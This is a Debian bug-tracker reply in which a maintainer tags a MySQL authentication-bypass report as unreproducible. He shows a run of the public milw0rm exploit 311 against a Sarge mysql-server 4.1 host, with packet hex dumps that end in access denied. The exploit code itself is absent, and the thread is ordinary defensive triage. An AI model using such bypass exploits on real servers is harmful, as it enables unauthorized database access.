tags 380507 + unreproducible moreinfo stop Hello Patrick
On 2006-07-30 Patrick Matthäi wrote: > http://www.milw0rm.com/exploits/311 > With this exploit it's able to authenticate with the mysql server > without any password. I cannot reproduce this behaviour. Which version do you use, this? # dpkg -s mysql-server-4.1 | grep Version Version: 4.1.11a-4sarge5 > Log: > [EMAIL PROTECTED]:~$ ./mysql.pl perl ********* Did you use more than your IP or your hostname as "***"? > It's an old exploit but the sargeversion is still exploitable. It should have been fixed in 4.1.3 long before the Sarge release. I get: $ ./milw0rm311.pl root app109 Using default MySQL port (3306) Received greeting: 00000000 47 00 00 00 0A 34 2E 31 2E 31 31 2D 44 65 62 69 00000010 61 6E 5F 34 73 61 72 67 65 35 2D 6C 6F 67 00 0D 00000020 00 00 00 6C 56 4A 51 36 58 3B 5E 00 2C A2 08 02 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 23 00000040 79 5A 39 4B 4E 27 76 3F 73 48 00 Sending caps packet: 00000000 3A 00 00 01 85 A6 03 00 00 00 00 01 08 00 00 00 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00000020 00 00 00 00 72 6F 6F 74 00 14 00 00 00 00 00 00 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Received reply: 00000000 45 00 00 02 FF 15 04 23 32 38 30 30 30 41 63 63 00000010 65 73 73 20 64 65 6E 69 65 64 20 66 6F 72 20 75 00000020 73 65 72 20 27 72 6F 6F 74 27 40 27 61 70 70 31 00000030 30 39 27 20 28 75 73 69 6E 67 20 70 61 73 73 77 00000040 6F 72 64 3A 20 59 45 53 29 Authentication failed! bye, -christian-

